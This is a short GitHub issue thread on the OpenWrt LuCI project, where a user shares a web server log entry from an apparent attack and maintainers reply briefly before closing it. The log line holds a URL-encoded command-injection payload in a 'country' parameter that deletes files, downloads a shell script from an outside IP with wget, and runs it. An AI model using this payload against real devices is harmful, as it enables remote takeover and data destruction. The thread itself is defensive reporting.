openwrt/luci #7113: Security issue

jeanbruder, 2024-05-07:
Dear LuCi Dev Team,

Please find below what I found today in my httpd log (not runing  LuCi) : looks like LuCi can be fooled to execute remote commands. Maybe the issue has been solved in the last release.

`80.94.92.60 - - [05/May/2024:20:50:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 500 273 "-
" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"`

Hope this can help, and sorry if this is not the right place to post.

Regards,
Jean

hnyman, 2024-05-07:
I don't think that the current LuCI uses any "stok" in the URL, so is your example from an old implementation or a vendor fork (of an old LuCI) ?  Or was that just an attack from internet that you just noticed?

systemcrash, 2024-05-07:
Bad idea to allow access to any administrative interface from the
Internet.

jeanbruder, 2024-05-07:
Dear @hnyman 

> I don't think that the current LuCI uses any "stok" in the URL, so is your example from an old implementation or a vendor fork (of an old LuCI) ?

I found this GET requests in my WEB server logs, and none of them are related to any kind of software running LuCi.

>Or was that just an attack from internet that you just noticed?

Exact ! And I wanted to share that fact as it may help to solve a potential 0-day issue.

Regards,
Jean

closed 2024-05-07 by jow-